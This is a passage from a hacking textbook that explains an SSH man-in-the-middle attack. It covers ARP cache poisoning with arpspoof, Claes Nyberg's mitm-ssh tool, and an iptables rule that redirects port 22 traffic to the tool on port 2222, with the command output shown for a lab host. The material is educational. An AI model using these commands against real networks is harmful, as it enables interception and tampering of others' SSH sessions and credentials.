Graphics Programs Reference
In-Depth Information
This means that the attacker actually maintains two separate encrypted
communication channels with two separate encryption keys. Packets from A
are encrypted with the first key and sent to the attacker, which A believes is
actually B. The attacker then decrypts these packets with the first key and
re-encrypts them with the second key. Then the attacker sends the newly
encrypted packets to B, and B believes these packets are actually being sent
by A. By sitting in the middle and maintaining two separate keys, the attacker
is able to sniff and even modify traffic between A and B without either side
being the wiser.
After redirecting traffic using an ARP cache poisoning tool, there are a
number of SSH man-in-the-middle attack tools that can be used. Most of
these are just modifications to the existing openssh source code. One notable
example is the aptly named mitm-ssh package, by Claes Nyberg, which has
been included on the LiveCD.
This can all be done with the ARP redirection technique from “Active
Sniffing” on page 239 and a modified openssh package aptly called mitm-
ssh. There are other tools that do this; however, Claes Nyberg's mitm-ssh
is publicly available and the most robust. The source package is on the
LiveCD in /usr/src/mitm-ssh, and it has already been built and installed.
When running, it accepts connections to a given port and then proxies
these connections to the real destination IP address of the target SSH
server. With the help of arpspoof to poison ARP caches, traffic to the target
SSH server can be redirected to the attacker's machine running mitm-ssh.
Since this program listens on localhost, some IP filtering rules are needed
to redirect the traffic.
In the example below, the target SSH server is at 192.168.42.72. When
mitm-ssh is run, it will listen on port 2222, so it doesn't need to be run as
root. The iptables command tells Linux to redirect all incoming TCP con-
nections on port 22 to localhost 2222, where mitm-ssh will be listening.
reader@hacking:~ $ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
reader@hacking:~ $ sudo iptables -t nat -L
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
REDIRECT tcp -- anywhere anywhere tcp dpt:ssh redir ports 2222
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
reader@hacking:~ $ mitm-ssh
..
/|\ SSH Man In The Middle [Based on OpenSSH_3.9p1]
_|_ By CMN <cmn@darklab.org>
Usage: mitm-ssh <non-nat-route> [option(s)]
Routes:
